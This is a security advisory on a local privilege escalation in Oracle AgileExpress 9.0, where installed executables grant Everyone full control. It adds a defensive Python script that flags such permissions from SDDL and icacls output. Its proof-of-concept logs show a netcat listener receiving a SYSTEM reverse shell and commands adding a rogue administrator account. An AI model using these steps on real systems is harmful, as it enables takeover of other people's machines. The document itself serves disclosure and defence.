Document Title:
===============
Oracle AgileExpress v9.0 - Privilege Escalation Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2114
Release Date:
=============
2018-01-16
Vulnerability Laboratory ID (VL-ID):
====================================
2114
Common Vulnerability Scoring System:
====================================
4.2
Vulnerability Class:
====================
Privilege Escalation
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Agile eXpress allows Agile users to create a PDX package containing product definition data and publish it to their partners.
Interested parties can then view the data using Agile eXpress even if they don't have access to the Agile server. The Agile Web
Client allows you to import product data created on another system or another Agile system into your Agile system. Using Agile
eXpress and the Agile Web Client, customers and partners can exchange all product information required to build a new product
or change an existing product.
(Copy of the Homepage: http://agile-express.software.informer.com/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local privilege escalation vulnerability in the Oracle AgileExpress 9.0 software.
Vulnerability Disclosure Timeline:
==================================
2017-11-02: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-11-03: Vendor Notification (Oracle Security Alerts)
2017-11-29: Vendor Response/Feedback (Oracle Security Alerts)
2017-12-04: Vendor Response/Feedback (Oracle Security Alerts - Removal of Software)
2017-12-04: Vendor Response/Feedback (Security Acknowledgement) (Oracle Security Alerts - Security-In-Depth Contributors)
2018-01-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Oracle AgileExpress v9.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A local privilege escalation vulnerability has been discovered in the official Oracle AgileExpress 9.0 software.
The vulnerability allows a local attacker to gain higher privileges by exploiting a permission misconfiguration
on the software's installed files.
The issue is located in the file permissions of the installed executables: the `Everyone` group is granted Full
Control (the `F` flag, FILE_ALL_ACCESS) on the files, including the main application binary, the uninstaller, the
launch helper and the bundled JRE binaries. Any local user, regardless of privilege level, can therefore replace
these executables with a binary of choice. When the replaced file is later executed by a higher-privileged context
(the proof of concept below obtains a shell as NT AUTHORITY\SYSTEM), the attacker's code runs with those privileges.
The security risk of the vulnerability is estimated as medium. Exploitation requires a low-privileged local user
account with restricted access and no user interaction. Successful exploitation results in compromise of the process
that executes the replaced file and, from there, further manipulation or compromise of the local operating system.
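The SDDL string and icacls flags quoted in the session logs below encode the misconfiguration directly: in `(A;OICIID;FA;WD)`, `A` is an access-allowed ACE, `OI`/`CI` make it inheritable by child files and folders, `ID` marks it as inherited from the parent directory, `FA` is FILE_ALL_ACCESS, and the trustee `WD` is the World (Everyone) SID; `Everyone:(I)(F)` is the same ACE as icacls prints it. The following Python script is an added example and not part of the original advisory or of Oracle's software. It parses both formats offline and reports every ACE that hands a write-type right (full control, modify, write, delete, WRITE_DAC, WRITE_OWNER) to a group that every local user belongs to, so captured `icacls <dir> /T` or `(Get-Acl <file>).Sddl` output can be triaged without touching the host. The SDDL sample is the string from the advisory; the icacls sample text and its paths are constructed for the demonstration.

```python
"""Flag write-capable ACEs granted to groups every local user belongs to.

Added example; not code from the advisory or from Oracle.  Reads, offline, the two
formats shown in the advisory's session logs: SDDL as printed by PowerShell's
(Get-Acl <file>).Sddl (e.g. D:AI(A;OICIID;FA;;;WD); the shortened (A;OICIID;FA;WD)
parses too) and icacls output with each ACE written as PRINCIPAL:(flag)(flag)...
"""
from __future__ import annotations

import re

# SDDL aliases, well-known SIDs and icacls account names of groups that any
# unprivileged local logon is a member of, mapped to one canonical label.
LOW_PRIV_PRINCIPALS = {
    "WD": "Everyone", "S-1-1-0": "Everyone", "everyone": "Everyone",
    "BU": "Users", "S-1-5-32-545": "Users", r"builtin\users": "Users",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    r"nt authority\authenticated users": "Authenticated Users",
    "IU": "Interactive", "S-1-5-4": "Interactive", r"nt authority\interactive": "Interactive",
}
# SDDL right codes that let the holder replace the file or rewrite its ACL:
# GENERIC_ALL/WRITE, FILE_ALL_ACCESS, FILE_GENERIC_WRITE, WRITE_DAC (the code
# "WD" in the rights field, unrelated to the Everyone SID), WRITE_OWNER, DELETE.
SDDL_WRITE_RIGHTS = {"GA", "GW", "FA", "FW", "WD", "WO", "SD"}
# The same rights as mask bits, for ACEs that carry a hex access mask instead.
WRITE_MASK = (0x2 | 0x4 | 0x10 | 0x100          # write/append data, write EA, write attrs
              | 0x10000 | 0x40000 | 0x80000     # DELETE, WRITE_DAC, WRITE_OWNER
              | 0x10000000 | 0x40000000)        # GENERIC_ALL, GENERIC_WRITE
# icacls tokens with the same effect, in simple (F, M, W, D) and specific form.
ICACLS_WRITE_PERMS = {"F", "M", "W", "D", "WDAC", "WO", "GA", "GW",
                      "WD", "AD", "WEA", "WA", "DE", "DC"}
# One icacls ACE.  Names containing spaces are recognised only under the listed
# well-known authorities, so a path with spaces is never mistaken for a principal.
_ACE_RE = re.compile(
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|APPLICATION PACKAGE AUTHORITY)\\[^:()]+?"
    r"|CREATOR OWNER|[^\s\\:()]+(?:\\[^\s:()]+)?)"
    r":(?P<perms>(?:\([^()]*\))+)")

def _canonical(principal: str) -> str | None:
    """Map an SDDL alias, numeric SID or icacls account name to a low-privilege label."""
    return LOW_PRIV_PRINCIPALS.get(principal) or LOW_PRIV_PRINCIPALS.get(principal.lower())

def sddl_rights_are_writable(rights: str) -> bool:
    """True if an SDDL rights field (two-letter codes or a hex mask) grants write-type access."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & WRITE_MASK)
    return bool({rights[i:i + 2] for i in range(0, len(rights), 2)} & SDDL_WRITE_RIGHTS)

def sddl_findings(sddl: str) -> list[tuple[str, str]]:
    """(principal, rights) for each access-allowed DACL ACE giving a low-privilege
    principal write-type access.  ACE fields: type;flags;rights;objguid;inhguid;sid."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))*)", sddl)
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) < 4 or fields[0] != "A":      # skip deny and audit ACEs
            continue
        rights, who = fields[2], _canonical(fields[-1])
        if who and sddl_rights_are_writable(rights):
            findings.append((who, rights))
    return findings

def icacls_perms_are_writable(perms: str) -> bool:
    """True if an icacls flag string such as (I)(F) or (OI)(CI)(RX,WD) grants
    write-type access.  Inheritance flags are ignored; a DENY ACE never counts."""
    tokens = {t.strip() for g in re.findall(r"\(([^()]*)\)", perms) for t in g.split(",")}
    return "DENY" not in tokens and bool(tokens & ICACLS_WRITE_PERMS)

def icacls_findings(text: str) -> list[tuple[str, str, str]]:
    """(path, principal, perms) for low-privilege principals with write-type access.
    icacls prints the path with the first ACE and further ACEs on indented lines,
    so a line without a path belongs to the previously seen file."""
    findings, path = [], ""
    for line in text.splitlines():
        aces = list(_ACE_RE.finditer(line))
        if not aces:
            continue
        prefix = line[:aces[0].start()].strip()
        prefix = re.sub(r"^\[\+\]\s*|\s*=+>$", "", prefix)   # tolerate '[+] file ======>' markup
        path = prefix or path
        for ace in aces:
            who = _canonical(ace["principal"])
            if who and icacls_perms_are_writable(ace["perms"]):
                findings.append((path, who, ace["perms"]))
    return findings

# SDDL string quoted in the advisory; the icacls text is constructed for the example.
SAMPLE_SDDL = "O:BAG:S-1-5-21-3389066293-2711879841-802680780-513D:AI(A;OICIID;FA;WD)"
SAMPLE_ICACLS = r"""
C:\Program Files\Agile eXpress\AgileExpress.exe Everyone:(I)(F)
                                                BUILTIN\Administrators:(I)(F)
C:\Program Files\Agile eXpress\jre\bin\java.exe Everyone:(I)(F)
C:\Program Files\Other\service.exe NT AUTHORITY\Authenticated Users:(I)(M)
                                   BUILTIN\Administrators:(I)(F)
C:\Program Files\Fixed\tool.exe BUILTIN\Users:(I)(RX)
                                BUILTIN\Administrators:(I)(F)
"""
```

Calling `sddl_findings(SAMPLE_SDDL)` returns the advisory's ACE as `("Everyone", "FA")`; `icacls_findings(SAMPLE_ICACLS)` returns the two AgileExpress files and the Modify grant to Authenticated Users, and stays silent on the file that grants Users only read and execute. Read-only or execute-only grants are never reported, because the escalation needs the ability to replace the binary, not to run it.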
Proof of Concept (PoC):
=======================
The local privilege escalation vulnerability can be exploited by local attackers with a low-privileged (standard) user account and without user interaction.
For security demonstration or to reproduce the security vulnerability, follow the information and steps below.
--- Session Logs (PRIVILEGES) ---
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
      FILE_ALL_ACCESS <-----------------------------
RW BUILTIN\Administrators
      READ_CONTROL
      WRITE_DAC
Owner  : BUILTIN\Administrators
Group  : MACHINE-PC\None
Access : Everyone Allow FullControl <-----------------------------
Sddl   : O:BAG:S-1-5-21-3389066293-2711879841-802680780-513D:AI(A;OICIID;FA;WD)
--- Session Logs (AGILEEXPRESS / PERMISSIONS) ---
[+] AgileExpress.exe ======> Everyone:(I)(F)
Path                  Owner                    Access
----                  -----                    ------
AgileExpress.exe      BUILTIN\Administrators   Everyone Allow FullControl
--- Session Logs (UNINSTALL / PERMISSIONS) ---
[+] Uninstall Agile eXpress.exe ======> Everyone:(I)(F)
--- Session Logs (RESOURCE / PERMISSIONS) ---
[+] remove.exe ======> Everyone:(I)(F)
[+] ZGWin32LaunchHelper.exe ======> Everyone:(I)(F)
--- Session Logs (JREBIN / PERMISSIONS) ---
[+] appletviewer.exe ======> Everyone:(I)(F)
[+] apt.exe ======> Everyone:(I)(F)
[+] extcheck.exe ======> Everyone:(I)(F)
[+] idlj.exe ======> Everyone:(I)(F)
[+] jabswitch.exe ======> Everyone:(I)(F)
[+] jar.exe ======> Everyone:(I)(F)
[+] jarsigner.exe ======> Everyone:(I)(F)
[+] java-rmi.exe ======> Everyone:(I)(F)
[+] java.exe ======> Everyone:(I)(F)
[+] javac.exe ======> Everyone:(I)(F)
[+] javadoc.exe ======> Everyone:(I)(F)
[+] javafxpackager.exe ======> Everyone:(I)(F)
[+] javah.exe ======> Everyone:(I)(F)
[+] javap.exe ======> Everyone:(I)(F)
[+] javaw.exe ======> Everyone:(I)(F)
[+] javaws.exe ======> Everyone:(I)(F)
[+] jcmd.exe ======> Everyone:(I)(F)
[+] jconsole.exe ======> Everyone:(I)(F)
[+] jdb.exe ======> Everyone:(I)(F)
[+] jhat.exe ======> Everyone:(I)(F)
[+] jinfo.exe ======> Everyone:(I)(F)
[+] jmap.exe ======> Everyone:(I)(F)
[+] jps.exe ======> Everyone:(I)(F)
[+] jrunscript.exe ======> Everyone:(I)(F)
[+] jsadebugd.exe ======> Everyone:(I)(F)
[+] jstack.exe ======> Everyone:(I)(F)
[+] jstat.exe ======> Everyone:(I)(F)
[+] jstatd.exe ======> Everyone:(I)(F)
[+] jvisualvm.exe ======> Everyone:(I)(F)
[+] keytool.exe ======> Everyone:(I)(F)
[+] kinit.exe ======> Everyone:(I)(F)
[+] klist.exe ======> Everyone:(I)(F)
[+] ktab.exe ======> Everyone:(I)(F)
[+] native2ascii.exe ======> Everyone:(I)(F)
[+] orbd.exe ======> Everyone:(I)(F)
[+] pack200.exe ======> Everyone:(I)(F)
[+] packager.exe ======> Everyone:(I)(F)
[+] policytool.exe ======> Everyone:(I)(F)
[+] rmic.exe ======> Everyone:(I)(F)
[+] rmid.exe ======> Everyone:(I)(F)
[+] rmiregistry.exe ======> Everyone:(I)(F)
[+] schemagen.exe ======> Everyone:(I)(F)
[+] serialver.exe ======> Everyone:(I)(F)
[+] servertool.exe ======> Everyone:(I)(F)
[+] tnameserv.exe ======> Everyone:(I)(F)
[+] unpack200.exe ======> Everyone:(I)(F)
[+] wsgen.exe ======> Everyone:(I)(F)
[+] wsimport.exe ======> Everyone:(I)(F)
[+] xjc.exe ======> Everyone:(I)(F)
Path                  Owner                    Access
----                  -----                    ------
appletviewer.exe      BUILTIN\Administrators   Everyone Allow FullControl
apt.exe               BUILTIN\Administrators   Everyone Allow FullControl
extcheck.exe          BUILTIN\Administrators   Everyone Allow FullControl
idlj.exe              BUILTIN\Administrators   Everyone Allow FullControl
jabswitch.exe         BUILTIN\Administrators   Everyone Allow FullControl
jar.exe               BUILTIN\Administrators   Everyone Allow FullControl
jarsigner.exe         BUILTIN\Administrators   Everyone Allow FullControl
java-rmi.exe          BUILTIN\Administrators   Everyone Allow FullControl
java.exe              BUILTIN\Administrators   Everyone Allow FullControl
javac.exe             BUILTIN\Administrators   Everyone Allow FullControl
javadoc.exe           BUILTIN\Administrators   Everyone Allow FullControl
javafxpackager.exe    BUILTIN\Administrators   Everyone Allow FullControl
javah.exe             BUILTIN\Administrators   Everyone Allow FullControl
javap.exe             BUILTIN\Administrators   Everyone Allow FullControl
javaw.exe             BUILTIN\Administrators   Everyone Allow FullControl
javaws.exe            BUILTIN\Administrators   Everyone Allow FullControl
jcmd.exe              BUILTIN\Administrators   Everyone Allow FullControl
jconsole.exe          BUILTIN\Administrators   Everyone Allow FullControl
jdb.exe               BUILTIN\Administrators   Everyone Allow FullControl
jhat.exe              BUILTIN\Administrators   Everyone Allow FullControl
jinfo.exe             BUILTIN\Administrators   Everyone Allow FullControl
jmap.exe              BUILTIN\Administrators   Everyone Allow FullControl
jps.exe               BUILTIN\Administrators   Everyone Allow FullControl
jrunscript.exe        BUILTIN\Administrators   Everyone Allow FullControl
jsadebugd.exe         BUILTIN\Administrators   Everyone Allow FullControl
jstack.exe            BUILTIN\Administrators   Everyone Allow FullControl
jstat.exe             BUILTIN\Administrators   Everyone Allow FullControl
jstatd.exe            BUILTIN\Administrators   Everyone Allow FullControl
jvisualvm.exe         BUILTIN\Administrators   Everyone Allow FullControl
keytool.exe           BUILTIN\Administrators   Everyone Allow FullControl
kinit.exe             BUILTIN\Administrators   Everyone Allow FullControl
klist.exe             BUILTIN\Administrators   Everyone Allow FullControl
ktab.exe              BUILTIN\Administrators   Everyone Allow FullControl
native2ascii.exe      BUILTIN\Administrators   Everyone Allow FullControl
orbd.exe              BUILTIN\Administrators   Everyone Allow FullControl
pack200.exe           BUILTIN\Administrators   Everyone Allow FullControl
packager.exe          BUILTIN\Administrators   Everyone Allow FullControl
policytool.exe        BUILTIN\Administrators   Everyone Allow FullControl
rmic.exe              BUILTIN\Administrators   Everyone Allow FullControl
rmid.exe              BUILTIN\Administrators   Everyone Allow FullControl
rmiregistry.exe       BUILTIN\Administrators   Everyone Allow FullControl
schemagen.exe         BUILTIN\Administrators   Everyone Allow FullControl
serialver.exe         BUILTIN\Administrators   Everyone Allow FullControl
servertool.exe        BUILTIN\Administrators   Everyone Allow FullControl
tnameserv.exe         BUILTIN\Administrators   Everyone Allow FullControl
unpack200.exe         BUILTIN\Administrators   Everyone Allow FullControl
wsgen.exe             BUILTIN\Administrators   Everyone Allow FullControl
wsimport.exe          BUILTIN\Administrators   Everyone Allow FullControl
xjc.exe               BUILTIN\Administrators   Everyone Allow FullControl
--------- ( NET USER SAIF ) ---------
User name saif
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
--------- ( NET LOCALGROUP ADMINISTRATORS ) ---------
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
dell < ------------
The command completed successfully.
- WHOAMI ====> MACHINE-PC\saif
c:\Users\Saif\Desktop\Nc\nc.exe -lvp 4433
Listening on [any] 4433 ...
Connect to [ 192.168............ ] from [ 192.168............ ] 49500
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
whoami
NT AUTHORITY\SYSTEM < ------------
C:\Windows\System32>net user /add test test
The command completed successfully.
C:\Windows\System32>net localgroup administrators /add test test
The command completed successfully.
C:\Windows\System32>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
dell
test < ------------
The command completed successfully.
--------- ( NET USER TEST ) ---------
User name test
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
- NOTE: with this access, a standard user can manage the other (administrator and user) accounts:
[+] Change account names
[+] Change passwords
[+] Remove passwords
[+] Set up Parental Controls
[+] Change account types
[+] Delete accounts
Solution - Fix & Patch:
=======================
Oracle inadvertently listed this software on the Oracle Technology Network and has removed the software and documentation from its download site:
Link : http://www.oracle.com/technetwork/apps-tech/index-097651.html
Link : http://www.oracle.com/technetwork/agileexpress-license-152008.html
Security Risk:
==============
The security risk of the local privilege escalation vulnerability in Oracle AgileExpress v9.0 software is estimated as medium (cvss 4.2).
Credits & Authors:
==================
S.AbenMassaoud [[email protected]] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™